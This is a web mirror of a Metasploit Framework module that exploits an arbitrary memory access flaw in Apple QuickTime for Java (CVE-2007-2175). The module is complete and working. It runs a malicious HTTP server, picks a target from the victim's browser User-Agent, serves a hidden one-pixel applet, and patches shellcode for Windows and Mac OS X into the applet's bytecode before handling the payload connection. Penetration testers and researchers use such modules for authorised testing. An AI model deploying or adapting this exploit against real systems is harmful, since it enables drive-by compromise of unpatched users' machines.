Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/qtjava_pointer.rb
19758 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access',

19
        'Description' => %q{

20
          This module exploits an arbitrary memory access vulnerability in the

21
          Quicktime for Java API provided with Quicktime 7.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'hdm',           # Original exploit for Mac OS X PPC / Win32

26
          'kf',            # Added support for Mac OS X X86

27
          'ddz'            # Discovered bug, provided tips

28
        ],

29
        'References' => [

30
          ['CVE', '2007-2175'],

31
          ['OSVDB', '34178'],

32
          ['BID', '23608'],

33
          ['ZDI', '07-023'],

34
        ],

35
        'Payload' => {

36
          'Space' => 1024,

37
          'BadChars' => ''

38
        },

39
        'Platform' => %w{win osx},

40
        'Targets' => [

41
          #

42
          # Problem with generic payloads + regenerate_payload still :(

43
          #

44
          #					[ 'Quicktime 7 Automatic',

45
          #						{

46
          #							'Platform' => ['win', 'osx'],

47
          #							'Arch' => [ARCH_X86, ARCH_PPC]

48
          #						}

49
          #					],

50
          [

51
            'Quicktime 7 on Windows x86',

52
            {

53
              'Platform' => 'win',

54
              'Arch' => ARCH_X86

55
            }

56
          ],

57
          [

58
            'Quicktime 7 on Mac OS X PPC',

59
            {

60
              'Platform' => 'osx',

61
              'Arch' => ARCH_PPC,

62
            }

63
          ],

64
          [

65
            'Quicktime 7 on Mac OS X x86',

66
            {

67
              'Platform' => 'osx',

68
              'Arch' => ARCH_X86,

69
            }

70
          ],

71
        ],

72
        #			'DefaultTarget'  => 0,

73
        'DisclosureDate' => '2007-04-23',

74
        'Notes' => {

75
          'Reliability' => UNKNOWN_RELIABILITY,

76
          'Stability' => UNKNOWN_STABILITY,

77
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

78
        }

79
      )

80
    )

81
  end

82


83
  def exploit

84
    # load the class data

85
    path = File.join(Msf::Config.data_directory, "exploits", "QTJavaExploit.class")

86
    fd = File.open(path, "rb")

87
    @class_data = fd.read(fd.stat.size)

88
    fd.close

89


90
    super

91
  end

92


93
  def on_request_uri(cli, req)

94
    # Create a cached mapping between IP and detected target

95
    @targetcache ||= {}

96
    @targetcache[cli.peerhost] ||= {}

97
    @targetcache[cli.peerhost][:update] = Time.now.to_i

98


99
    if (target.name =~ /Automatic/)

100
      case req.headers['User-Agent']

101
      when /Windows/i

102
        print_status("Choosing a Windows target")

103
        @targetcache[cli.peerhost][:target] = self.targets[1]

104
      when /PPC Mac OS X/i

105
        print_status("Choosing a Mac OS X PPC target")

106
        @targetcache[cli.peerhost][:target] = self.targets[2]

107
      when /Intel Mac OS X/i

108
        print_status("Choosing a Mac OS X x86 target")

109
        @targetcache[cli.peerhost][:target] = self.targets[3]

110
      end

111
    end

112


113
    # Clean the cache

114
    rmq = []

115
    @targetcache.each_key do |addr|

116
      if (Time.now.to_i > @targetcache[addr][:update] + 60)

117
        rmq.push addr

118
      end

119
    end

120


121
    rmq.each { |addr| @targetcache.delete(addr) }

122


123
    # Request processing

124


125
    if (not req.uri.match(/\.class$/i))

126


127
      # Redirect to the base directory so the applet code loads...

128
      if (not req.uri.match(/\/$/))

129
        send_redirect(cli, get_resource() + '/', '')

130
        return

131
      end

132


133
      # Display the applet loading HTML

134
      print_status("Sending HTML")

135
      send_response_html(cli, generate_html(), { 'Content-Type' => 'text/html' })

136
      return

137
    end

138


139
    # Send the actual applet over

140
    print_status("Sending applet")

141
    send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' })

142


143
    # Handle the payload

144
    handler(cli)

145
  end

146


147
  def generate_html()

148
    return "<html><head></head><body><applet width='1' height='1' code='QTJavaExploit.class'></applet></body></html>"

149
  end

150


151
  def generate_applet(cli, req)

152
    this_target = nil

153
    if (target.name =~ /Automatic/)

154
      if (@targetcache[cli.peerhost][:target])

155
        this_target = @targetcache[cli.peerhost][:target]

156
      else

157
        return ''

158
      end

159
    else

160
      this_target = target

161
    end

162


163
    # make a copy..

164
    data = @class_data.dup

165


166
    # 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86

167
    idx_targ = data.index("\x03\x10\xcc\x54")

168


169
    # 1024 bytes for shellcode

170
    idx_code = data.index("\x03\x10\xf0\x54")

171


172
    # Handle Mac OS X PPC

173
    if (this_target.arch.include?(ARCH_PPC))

174
      tp = regenerate_payload(cli, 'osx', ARCH_PPC, this_target)

175
      data = patch_bytecode(idx_code, data, tp.encoded)

176
      data = patch_bytecode(idx_targ, data, "\x01")

177
    end

178


179
    # Handle Mac OS X x86 / Windows x86

180
    if (this_target.arch.include?(ARCH_X86))

181


182
      if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows))

183
        tp = regenerate_payload(cli, 'win', ARCH_X86, this_target)

184
        data = patch_bytecode(idx_code, data, tp.encoded)

185
        data = patch_bytecode(idx_targ, data, "\x03")

186
      end

187


188
      if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX))

189
        tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target)

190
        data = patch_bytecode(idx_code, data, tp.encoded)

191
        data = patch_bytecode(idx_targ, data, "\x02")

192
      end

193
    end

194


195
    return data

196
  end

197


198
  def patch_bytecode(off, data, buff)

199
    cnt = 0

200
    off -= 1

201
    while (cnt < buff.length)

202
      cnt += 1

203
      while (!(data[off - 1] == 0x10 && data[off + 1] == 0x54))

204
        off += 1

205
      end

206
      data[off] = buff[cnt - 1]

207
      off += 1

208
    end

209


210
    return data

211
  end

212


213
end

214


215